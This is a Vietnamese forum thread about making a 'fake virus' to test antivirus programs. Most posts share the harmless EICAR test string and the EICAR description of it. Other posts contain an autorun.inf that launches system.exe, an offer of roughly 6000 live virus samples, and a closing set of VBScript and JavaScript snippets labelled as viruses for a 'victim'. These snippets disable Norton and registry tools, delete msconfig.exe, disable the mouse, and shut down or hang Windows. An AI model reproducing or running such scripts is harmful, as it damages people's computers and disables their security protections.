[Hướng dẫn] CÁch tẠo virus Ảo ĐỂ kiỂm tra chƯƠng trÌnh diỆt virus

[lehuynhngocnhu_hironsame]

may bac oi!!!!!!!!!!!!!! cuu may em voiiiiiiiiiiiii

may em bi con víu thu tren kia chay wa' troi` luon

may' cu' chop' khong ngung`........huhuhu...........

Giúp ME

---------- Bài viết vừa được nhập tự động bởi hệ thống ----------

Trích:

gacget

You must be registered for see links

CÁCH TẠO VIRUS ẢO ĐỂ KIỂM TRA CHƯƠNG TRÌNH DIỆT VIRUS

không biết có ai post chưa ,mình mới sưu tầm được.

1.Mở notepad.

2.Dán đoạn ngựa này vào: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3.save lại với tên test.exe

4.nếu sau khi save mà chương trình báo có virus thì tốt, còn bất thì chương trình đó tiêu rồi.

may bac oi!!!!!!!!!!!!!! cuu may em voiiiiiiiiiiiii

may em bi con víu thu tren kia chay wa' troi` luon

may' cu' chop' khong ngung`........huhuhu...........

Giúp ME

 

Tags: cách tạo file test antivirus

[Kort]

Trích:

pdtg50

You must be registered for see links

cái này thì có lâu rồi, thử thì tốt nhưng mà muốn chắc ăn thì theo em nhớ bất lầm, trên mạng có 1 phần mềm giả lập tấn công để coi coi máy có an toàn trước virus bất các bạn thử search xem. lâu rồi bất dùng em quên mất tên phần mềm đó rồi

bạn cho một link down phần mền đó sài thử xem nào.thank

---------- Bài viết vừa được nhập tự động bởi hệ thống ----------

Trích:

[autorun]

;a

open=system.exe

;a

shellexecute=system.exe

;a

shell\Explore\command=system.exe

;a

shell\Open\command=system.exe

;a

shell=Explore

cái này dùng để test phần mền diệt outorun được không bạn

 

[Thaddeus]

Trích:

[autorun]

;a

open=system.exe

;a

shellexecute=system.exe

;a

shell\Explore\command=system.exe

;a

shell\Open\command=system.exe

;a

shell=Explore

Trích:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Xài Avast Pro 4.8 máy chạy nhẹ hều , quét virus chắc là nhanh nhất , key thì 2951 ngày . Thử làm 2 cái trên vừa nhấp nút save lại là Avast nó hú lên luôn

 

[Wat]

các anh vào đây mà kiểm tra av của mình nè

You must be registered for see links

(đó là trang web có ngựa ở trênn đó!

 

[tthuythusaothuy2004]

hay quá mình để chế độ tự động xóa, kis xóa luôn bất cần hỏi

 

[nang_la30]

This test file has been provided to EICAR for distribution as the "EICAR Standard Anti-Virus Test File", and it satisfies all the criteria listed above. It is safe to pass around, because it is not a virus, and does not include any fragments of viral code. Most products react to it as if it were a virus (though they typically report it with an obvious name, such as "EICAR-AV-Test").

The file is a legitimate DOS program, and produces sensible results when run (it prints the message "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!").

It is also short and simple - in fact, it consists entirely of printable ASCII characters, so that it can easily be created with a regular text editor. Any anti-virus product that supports the EICAR test file should detect it in any file providing that the file starts with the following 68 characters, and is exactly 68 bytes long:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

The first 68 characters is the known string. It may be optionally appended by any combination of whitespace characters with the total file length not exceeding 128 characters. The only whitespace characters allowed are the space character, tab, LF, CR, CTRL-Z. To keep things simple the file uses only upper case letters, digits and punctuation marks, and does not include spaces. The only thing to watch out for when typing in the test file is that the third character is the capital letter "O", not the digit zero.

You are encouraged to make use of the EICAR test file. If you are aware of people who are looking for real viruses "for test purposes", bring the test file to their attention. If you are aware of people who are discussing the possibility of an industry-standard test file, tell them about

You must be registered for see links

, and point them at this article.

In order to facilitate various scenarios, we provide 4 files for download. The first, eicar.com, contains the ASCII string as described above. The second file, eicar.com.txt, is a copy of this file with a different filename. Some readers reported problems when downloading the first file, which can be circumvented when using the second version. Just download and rename the file to "eicar.com". That will do the trick. The third phiên bản contains the test file inside a zip ARCHIVEe. A good anti-virus scanner will spot a 'virus' inside an ARCHIVEe. The last phiên bản is a zip ARCHIVEes containing the third file. This file can be used to see whether the virus scanner checks ARCHIVEes more than only one level deep.

Once downloaded run your AV scanner. It should detect at least the file "eicar.com". Good scanners will detect the 'virus' in the single zip ARCHIVEe and may be even in the double zip ARCHIVEe. Once detected the scanner might not allow you any access to the file(s) anymore. You might not even be allowed by the scanner to delete these files. This is caused by the scanner which puts the file into quarantaine. The test file will be treated just like any other real virus infected file. Read the user's manual of your AV scanner what to do or contact the vendor/manufacturer of your AV scanner.

 

[Eoforwic]

hay đó................

 

[Dowle]

kì thế nhỉ sao avira premium 9 chả báo gì còn thằng bkav thì phát hiện virus mới lạ chứ

 

[Elroi]

Trích:

ngusidandon8

You must be registered for see links

kì thế nhỉ sao avira premium 9 chả báo gì còn thằng bkav thì phát hiện virus mới lạ chứ

có chuyện hay thật chẳng lẽ bkav lại hơn avira ư

mà cũng hay đó

---------- Bài viết vừa được nhập tự động bởi hệ thống ----------

này các pác tui cũng thank một cái hay lém

nhưng tui mở Word Pad zán thì nó cũng phát hiện ra virus :Eicar-Test-Signature

 

[Gow]

Chả có động tĩnh gì .... Chắc trình diệt virus mình gà ... quá

 

[neu_1326]

bon nay` bjet j` dau ma` chem' lao' the'

no' lua` chung' may` dey'

thag nao` ngu thy` vo^ ma` test

 

[Jarron]

Cái này mình vừa từng đọc trong 1001 thủ thuật (echip) bất qua mặt được KIS, KAS... đâu !

 

[vodoi_vn]

Trích:

gacget

You must be registered for see links

CÁCH TẠO VIRUS ẢO ĐỂ KIỂM TRA CHƯƠNG TRÌNH DIỆT VIRUS

không biết có ai post chưa ,mình mới sưu tầm được.

1.Mở notepad.

2.Dán đoạn ngựa này vào: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3.save lại với tên test.exe

4.nếu sau khi save mà chương trình báo có virus thì tốt, còn bất thì chương trình đó tiêu rồi.

Vô dụng thôi. cái này của bạn trả toàn chẳng phải virus nên chình diệt virus có diệt nó hay bất cũng chẳng có ngĩa lý gì cả. Muốn thử chỉ chuyện dơn giản là mang USB đi các máy khác kiếm vài con virus thực sự về xem nó có băm ngay không. Vậy mới biết đâu là thứ thiệt.

 

[sexy_baby_lovely2303]

Trùi ui, bất biết sao chứ KAV nhà em mới bấm save được 5s thì báo có virus EICAR-TESTFILE và kêu éc (giống chọc tiết lợn quá hà)

 

[Eoforwic]

Anh biết cách làm ra (tạo) virus hay sao mà làm được như thế bày em cái ......

 

[bachduyanh1302]

trời !!!vậy viết chi cho mệt

 

[linhxinh_sweetcandy]

Good lắm bạn,khi nào có mới up lên thử nhé,thank you

 

[Bradfurd]

Ảivva nhà mình nó chả báo sao cả

 

[suzuki_vn]

Thanks nhé!

Cũng rất là hay! Dưới đây là link media fire có khoảng 6000 con virus sưu tập được khi lướt web. Nếu ai muốn thử phần mềm diệt virus của mình có ổn bất thì down về giải nén ra và quét thử nhé. Quét được tầm 5000 con là quá khá rồi.

You must be registered for see links

Lưu ý là không cùng nguy hiểm nhé . Nó có thể chén windows bất cứ lúc nào bất biết nếu như phần mềm diệt virus bất đủ mạnh để kiểm soát.

Kinh nghiệm: Nếu thấy máy đơ quá thì khởi động lại nhấn F8 để vào safe mode rồi xóa cái file giải nén đó.

Chúc thành công!

 

[Aibne]

tớ cũng siêu tầm được một số đoạn ngựa tạo víut nhỏ pots lên cùng tham tiềmo nhé:

Chỉ với Notepad hay Wordpad bạnđã có thể tự làm ra (tạo) cho mình 1 "chú" Virus dưới dạng _VBSCRIPT hay _Javascript rồi:

Dưới đây là code của một số con virus nhỏ dưới dạng VBS:

1.Không cho victim khởi động máy:

Dim wsh

Set wsh = createobject("wscript.shell")

wsh.run "RUNDLL32.EXE user.exe,exitwindows"

2. Disable NAV:

Dim wsh

Set wsh= CreateObject( "WScript.Shell")

s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\S ervi c es\Norton Program

Scheduler\Start"

wsh.RegWrite s1,3, "REG_DWORD"

3. Hiển thị một message mỗi khi reboot máy:

dim wsh

Set wsh = CreateObject( "WScript.Shell" )

s1 = "HKLM\Software\Microsoft\Windows\CurrentVersio n\Wi n Logon\"

s2 = "LegalNoticeCaption"

s3 = "LegalNoticeText"

wsh.RegWrite s1+s2, "http://allformy.topcities.com"

wsh.RegWrite s1+s3, "Ta la anh_hung_bat_dac_di000-Toi den tu HVA"

4. Hiển thị một dòng lệnh khi click vào file hay folder:,

set reg=createobject("WScript.shell")

reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Ban da bi toi khong che"

reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che","I_LOVE_U"

5. Làm cho các trò trên hoạt động bình thường:

Dim objShell

Set objShell = CreateObject( "WScript.Shell" )

s1 = "HKEY_USERS\.Default\Software\Microsoft\Window s\Cu rrentVersion\ "

s2 = "Policies\System\DisableRegistryTools"

objShell.RegWrite s1+s2,1, "REG_DWORD"

Dưới dạng Javascipt :

var wsh;

wsh=new ActiveXObject ("Wscript.shell");

// Winlogon when reboot

var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVe rsio n \\WinLogon\\";

var s2 = "LegalNoticeCaption";

var s3 = "LegalNoticeText";

wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;

wsh.RegWrite (s1+s3, "Ban da bi toi khong che") ;

//Disable Registry

var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Wi ndow s\\CurrentVers ion\\";

var s2 = "Policies\\System\\DisableRegistryTools" ;

wsh.RegWrite (s1+s2,0,"REG_DWORD");

//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn

var fso;

fso=new ActiveXObject("Scripting.FileSystemObject");

var fe=fso.getfile("C:\\windows\\msconfig.exe);

fe.delete true;

//Shutdown windows

//Disable Mouse

wsh.run ("RUNDLL32.EXE mouse,disable");

//Hang up windows

wsh.run ("rundll32 user,disableoemlayer");